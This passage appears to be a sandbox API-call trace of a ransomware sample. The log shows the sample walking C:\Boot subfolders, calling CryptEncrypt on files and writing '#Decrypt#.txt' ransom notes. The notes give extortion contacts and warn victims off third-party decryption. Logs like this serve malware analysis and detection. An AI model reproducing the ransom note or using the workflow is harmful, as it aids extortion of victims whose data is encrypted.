lpOverlapped=0x0) returned 1 [0124.922] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0124.922] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0124.922] CloseHandle (hObject=0x1dc) returned 1 [0124.922] GetProcessHeap () returned 0x780000 [0124.922] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0124.922] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0124.923] lstrcmpiW (lpString1="sv-SE", lpString2="Windows") returned -1 [0124.923] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE") returned 17 [0124.923] lstrcmpW (lpString1="sv-SE", lpString2=".") returned 1 [0124.923] lstrcmpW (lpString1="sv-SE", lpString2="..") returned 1 [0124.923] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\sv-SE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0124.923] GetProcessHeap () returned 0x780000 [0124.923] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0124.923] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\*") returned 19 [0124.924] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0124.924] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0124.924] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\.") returned 19 [0124.924] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0124.924] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0124.925] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0124.925] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\..") returned 20 [0124.925] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0124.925] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0124.925] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0124.925] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0124.925] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 33 [0124.925] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0124.925] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0124.925] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0124.926] lstrlenW (lpString=".testttjffg") returned 11 [0124.926] StrStrW (lpFirst="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0124.926] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0124.926] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0124.926] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.002] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0125.002] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0125.002] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\#Decrypt#.txt") returned 31 [0125.002] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\#Decrypt#.txt" (normalized: "c:\\boot\\sv-se\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0125.003] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0125.003] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0125.004] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0125.004] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0125.005] CloseHandle (hObject=0x1dc) returned 1 [0125.005] GetProcessHeap () returned 0x780000 [0125.005] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0125.005] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0125.005] lstrcmpiW (lpString1="tr-TR", lpString2="Windows") returned -1 [0125.005] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR") returned 17 [0125.006] lstrcmpW (lpString1="tr-TR", lpString2=".") returned 1 [0125.006] lstrcmpW (lpString1="tr-TR", lpString2="..") returned 1 [0125.006] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\tr-TR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0125.006] GetProcessHeap () returned 0x780000 [0125.006] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0125.006] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\*") returned 19 [0125.006] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0125.007] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0125.007] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\.") returned 19 [0125.007] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0125.007] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0125.007] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0125.008] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\..") returned 20 [0125.008] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0125.008] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0125.008] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0125.008] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0125.008] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 33 [0125.008] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0125.008] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0125.008] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0125.009] lstrlenW (lpString=".testttjffg") returned 11 [0125.009] StrStrW (lpFirst="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0125.009] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0125.009] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0125.009] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.009] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0125.009] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0125.010] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\#Decrypt#.txt") returned 31 [0125.010] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\#Decrypt#.txt" (normalized: "c:\\boot\\tr-tr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0125.010] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0125.010] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0125.012] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0125.012] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0125.012] CloseHandle (hObject=0x1dc) returned 1 [0125.013] GetProcessHeap () returned 0x780000 [0125.013] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0125.013] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0125.013] lstrcmpiW (lpString1="zh-CN", lpString2="Windows") returned 1 [0125.013] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN") returned 17 [0125.013] lstrcmpW (lpString1="zh-CN", lpString2=".") returned 1 [0125.014] lstrcmpW (lpString1="zh-CN", lpString2="..") returned 1 [0125.014] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\zh-CN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0125.014] GetProcessHeap () returned 0x780000 [0125.014] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0125.014] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\*") returned 19 [0125.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0125.015] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0125.015] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\.") returned 19 [0125.015] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0125.015] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 